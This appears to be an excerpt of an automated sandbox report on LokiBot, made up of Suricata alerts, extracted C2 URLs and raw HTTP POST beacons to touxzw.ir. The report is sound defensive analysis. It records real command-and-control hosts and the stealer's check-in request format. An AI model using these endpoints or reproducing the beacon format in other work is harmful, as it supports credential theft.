Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50036 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50022 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49976 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50036 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49953 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.96.1:80 -> 192.168.2.5:49775
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50042 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50035 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50042 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50028 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.96.1:80 -> 192.168.2.5:50013
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50042 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50016 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.96.1:80 -> 192.168.2.5:49937
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50016 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50016 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.96.1:80 -> 192.168.2.5:50026
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.96.1:80 -> 192.168.2.5:50012
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50016 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49953 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50029 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50039 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50039 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50039 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49976 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.96.1:80 -> 192.168.2.5:50019
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.96.1:80 -> 192.168.2.5:50036
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49910 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49910 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49910 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.96.1:80 -> 192.168.2.5:50031
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.96.1:80 -> 192.168.2.5:50008
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50039 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50024 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49910 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50033 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50033 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50033 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50018 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50018 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50018 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50024 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50033 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50018 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.96.1:80 -> 192.168.2.5:50035
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.96.1:80 -> 192.168.2.5:50029
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.96.1:80 -> 192.168.2.5:50014
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49976 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.96.1:80 -> 192.168.2.5:50039
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50041 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49976 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50041 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50041 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50041 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50011 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50011 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50011 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.96.1:80 -> 192.168.2.5:50023
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50011 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50025 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50025 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50025 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50025 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.96.1:80 -> 192.168.2.5:50041
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:49964 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:49964 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:49964 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50021 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50021 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50021 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.96.1:80 -> 192.168.2.5:49953
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.96.1:80 -> 192.168.2.5:49976
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:49964 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.96.1:80 -> 192.168.2.5:50011
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50037 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50037 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50037 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50021 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50037 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50017 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.96.1:80 -> 192.168.2.5:50016
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50017 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50017 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50017 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.96.1:80 -> 192.168.2.5:49964
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.96.1:80 -> 192.168.2.5:50024
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.96.1:80 -> 192.168.2.5:50021
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50038 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50038 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50038 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50030 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50030 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50030 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50010 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50038 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50010 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50010 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50030 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50034 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50034 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50010 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50034 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50034 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.96.1:80 -> 192.168.2.5:50038
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50020 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50020 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50020 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.96.1:80 -> 192.168.2.5:50010
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50020 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50027 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50027 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50027 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50004 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50004 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50027 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50004 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.96.1:80 -> 192.168.2.5:50034
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50004 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.96.1:80 -> 192.168.2.5:50028
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50040 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50040 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50040 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50040 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.5:50032 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.5:50032 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.5:50032 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.96.1:80 -> 192.168.2.5:50020
Source: Network traffic	Suricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.5:50032 -> 104.21.96.1:80
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.96.1:80 -> 192.168.2.5:50004
Source: Network traffic	Suricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 104.21.96.1:80 -> 192.168.2.5:50032

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\SysWOW64\svchost.exe

Network Connect: 104.21.96.1 80

Jump to behavior

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: http://kbfvzoboss.bid/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.trade/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.win/alien/fre.php
Source: Malware configuration extractor	URLs: http://alphastand.top/alien/fre.php

Source: Joe Sandbox View	IP Address: 104.21.96.1 104.21.96.1
Source: Joe Sandbox View	IP Address: 104.21.96.1 104.21.96.1

Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 180Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 180Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 153Connection: close
Source: global traffic	HTTP traffic detected: POST /sccc/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: touxzw.irAccept: /Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: D509030Content-Length: 153Connection: close
